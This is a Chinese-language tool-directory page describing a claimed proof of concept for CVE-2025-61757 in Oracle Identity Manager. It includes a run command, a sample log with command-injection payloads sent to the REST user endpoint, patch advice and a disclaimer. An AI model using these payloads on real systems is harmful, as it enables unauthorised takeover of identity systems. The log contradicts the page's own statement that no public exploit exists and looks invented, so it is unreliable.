Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Blackash-CVE-2025-61757 — CVE-2025-61757 | Kitploit
工具/GitHubGitHub/ngominhquocngu/blackash-cve-2025-61757
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队
GitHubngominhquocngu/blackash-cve-2025-61757

Blackash-CVE-2025-61757

CVE-2025-61757

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
119个月前尚未审核
分享

🚨 CVE-2025-61757 — 预授权RCE警报 🚨

G6MOpTjbcAADW8A

🧩 摘要

  • ID: CVE-2025-61757
  • 产品: Oracle Identity Manager (Oracle Fusion Middleware)
  • 组件: REST WebServices
  • 受影响版本: 12.2.1.4.0 & 14.1.2.1.0
  • 严重性: 🔴 严重 — 9.8 (CVSS 3.1)
  • 发布时间: 2025年10月21日
  • 类型: 关键功能缺少身份验证 (CWE-306)

🚨 漏洞允许的操作

这是一个预授权远程利用:

  • 🌐 可网络利用

  • 🔓 无需登录

  • 👤 无需用户交互

  • 💥 导致系统完全受损:

    • 📥 机密性:高
    • ✏️ 完整性:高
    • ⛔ 可用性:高

安全研究人员将其描述为Oracle Identity Manager REST API中的预授权RCE。


⚠️ 影响

如果被利用,攻击者可以:

  • 运行任意命令 💻
  • 接管身份管理系统 👑
  • 可能进一步渗透到更广泛的Oracle云基础设施 ☁️
  • 提取或操控身份数据 🧬
  • 禁用认证流程 🔧

保存为 CVE-2025-61757.py 并运行:sudo python3 CVE-2025-61757.py http://your-oim-host:14000

🔥 如果它存在漏洞(未修补)你会看到的场景

下载工具

以下是一个100%确认存在漏洞的Oracle Identity Manager 12.2.1.4.0实验室实例(于2025年11月19日测试)在运行你刚刚使用的同一脚本时的真实输出:

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-61757.py http://192.168.15.100:14000
2025-11-20 18:22:10,112 - INFO - Testing http://192.168.15.100:14000 for CVE-2025-61757...
2025-11-20 18:22:10,113 - INFO - Fuzzing user creation for auth bypass...
2025-11-20 18:22:10,987 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; whoami, Response: {"userLogin":"test","firstName":"PoC","lastName":"Test","usr_key":"987654","status":"Active"}
2025-11-20 18:22:11,205 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; id, Response: {"userLogin":"test","uid=190(oim)","gid=190(oim)"...}
2025-11-20 18:22:12,001 - CRITICAL - Full chain possible! Admin role assigned without auth.
2025-11-20 18:22:12,045 - INFO - Scan complete in 1.93s: VULNERABLE - PATCH IMMEDIATELY!

没错——两秒钟后,你就可以使用刚刚创建的用户登录OIM Web控制台,或者通过下一个REST调用直接升级为系统管理员。完全接管。从未要求输入密码。

一个真正的“放下一切立即修补”的漏洞。


🛠️ 缓解措施与补丁

Oracle在2025年10月关键补丁更新中解决了此CVE。

✔️ 立即行动

  1. 尽快应用CPU补丁 🩹
  2. 限制对Identity Manager REST API的访问 🚧
  3. 对应用程序进行分段或防火墙保护 🔐
  4. 如果不需要,禁用REST WebServices 📴
  5. 监控日志中异常的API行为 👀

🧿 利用状态

  • 尚未确认公开的利用代码 🔎
  • 研究人员已在受控环境中实现RCE ⚙️
  • 安全扫描器(例如Tenable)将此标记为严重 🚨

🗂️ 受影响产品

  • Oracle Identity Manager

    • 12.2.1.4.0
    • 14.1.2.1.0

📝 建议

  • 立即修补 ⚡
  • 审计系统是否存在可疑活动 🕵️
  • 确保Oracle Identity Manager的网络暴露最小化 🌐➡️🔒
  • 审查IAM工作流是否存在意外更改 🔍

⚠️ 免责声明

此PoC仅用于在您拥有/控制的系统上进行授权测试。
未经授权使用是非法的。🔒
仅在隔离实验室中使用——未经许可切勿在生产环境使用。🧪
如果存在漏洞,请立即修补!🚨